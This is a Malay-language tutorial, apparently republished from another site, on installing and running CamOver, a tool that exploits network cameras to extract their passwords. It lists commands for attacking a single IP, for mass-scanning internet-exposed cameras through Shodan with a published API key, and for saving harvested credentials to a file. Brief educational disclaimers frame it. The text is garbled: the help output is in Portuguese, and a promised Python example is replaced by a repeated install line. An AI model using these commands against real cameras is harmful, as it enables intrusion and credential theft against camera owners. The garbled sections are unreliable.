Hari ini kita akan bercakap tentang alat yang menarik: CamOver, digunakan untuk mengeksploitasi kelemahan dalam kamera rangkaian, mendapatkan kata laluannya dan menjalankan pelbagai jenis serangan. Serangan berlaku dengan mengeksploitasi kelemahan dalam model kamera popular, seperti CCTV, GoAhead dan Netwave. Di bawah saya akan menerangkan secara terperinci cara memasang dan menggunakan CamOver.
Menggodam kamera rangkaian dengan CamOver
Artikel ini bertujuan semata-mata untuk tujuan pendidikan dan untuk mempelajari penggodaman beretika. Akses tanpa kebenaran kepada kamera rangkaian adalah menyalahi undang-undang dan dianggap sebagai jenayah. Baik tapak web spy-soft.net mahupun pengarang tidak bertanggungjawab atas tindakan anda.
Untuk memasang alat, hanya gunakan arahan berikut:
pip3 install git+https://github.com/EntySec/CamOver
Selepas memasang, cuma mulakan CamOver dengan arahan:
camover
-h, --help Exibe a mensagem de ajuda e sai. -t, --threads Usa multithreading para acelerar o processo. -o OUTPUT, --output OUTPUT Salva os resultados em um arquivo. -i INPUT, --input INPUT Arquivo com endereços das câmeras. -a ADDRESS, --address ADDRESS Um único endereço de câmera. --shodan SHODAN Chave de API do Shodan para explorar câmeras pela internet. --zoomeye ZOOMEYE Chave de API do ZoomEye para explorar câmeras pela internet. -p PAGES, --pages PAGES Número de páginas a ser buscado no ZoomEye.
Andaikan ada kamera dengan alamat IP 192.168.99.100. Untuk menyemak sama ada ia boleh dieksploitasi, jalankan arahan berikut:
camover -a 192.168.99.100
Untuk mencari kamera dalam talian menggunakan Shodan, jalankan:
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
Kunci API Shodan (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) disediakan sebagai contoh. Anda boleh menggunakan ini atau kunci anda sendiri.
Jika anda mempunyai senarai alamat kamera dalam fail yang dipanggil cameras.txt, anda boleh cuba menerokanya dan menyimpan kata laluan yang diperoleh dalam passwords.txt:
camover -t -i cameras.txt -o passwords.txt
CamOver juga menyediakan API Python untuk menyepadukan alat ke dalam kod anda. Contoh di bawah menunjukkan cara membuat objek CamOver, meneroka kamera melalui IP dan memaparkan bukti kelayakan yang diperoleh:
pip3 install git+https://github.com/EntySec/CamOver
CamOver ialah alat yang berkuasa untuk mengeksploitasi kelemahan dalam kamera rangkaian. Jika anda berminat dengan topik ini, ia boleh menjadi sumber yang berharga untuk mempelajari tentang keselamatan rangkaian dan ujian penembusan.
⚠️ Penafian: Menggunakan alatan seperti CamOver untuk aktiviti yang tidak dibenarkan adalah jenayah dan boleh membawa hukuman yang serius. Gunakan maklumat ini hanya untuk tujuan undang-undang dan etika.
Atas ialah kandungan terperinci CamOver — alat untuk mengeksploitasi kelemahan dalam kamera rangkaian. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!